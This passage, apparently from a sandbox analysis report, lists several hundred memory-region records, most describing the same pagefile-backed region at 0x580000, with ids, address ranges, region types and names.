0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11053 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11054 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11055 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11056 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11057 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11058 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11059 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11060 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11062 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11063 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11064 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11065 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11066 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11067 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11068 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11069 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11070 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11071 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11072 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11073 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11074 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11075 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11076 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11077 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11078 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11079 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11080 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11081 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11082 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11083 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11084 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11085 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11086 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11087 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11088 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11089 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11090 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11091 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11092 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11093 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11094 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11095 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11096 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11097 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11098 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11099 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11100 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11101 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11102 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11103 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11104 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11105 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11106 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11107 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11108 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11110 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11111 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11112 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11113 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11114 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11115 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11116 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11118 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11119 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11120 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11121 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11122 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11123 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11124 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11125 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11126 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11127 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11128 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11129 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11131 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11132 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11133 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11134 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11135 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11136 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11137 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11138 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11139 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11140 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11141 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11142 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11143 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11144 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11145 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11146 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11147 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11148 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11149 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11150 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11151 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11152 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11153 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11154 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11155 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11156 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11157 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11158 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11159 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11160 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11161 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11162 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11163 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11164 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11165 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11166 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11167 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11168 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11169 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11170 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11171 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11172 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11173 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11174 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11175 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11176 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11177 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11178 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11179 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11180 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11181 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11182 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11183 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11184 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11185 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11186 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11187 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11188 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11189 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11190 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11191 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11192 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11193 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11194 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11195 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11196 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11197 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11198 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11199 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11200 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11201 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11202 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11203 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11204 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11205 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11206 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 11207 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 11208 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11209 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11210 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11211 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11212 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11213 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11214 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11215 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11216 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11217 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11218 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11219 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11220 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11221 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11222 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11223 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11224 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11225 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11226 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11227 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11228 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11229 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11230 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11231 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11232 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11233 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11234 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11235 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11236 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11237 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11238 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11239 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11240 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 11241 start_va = 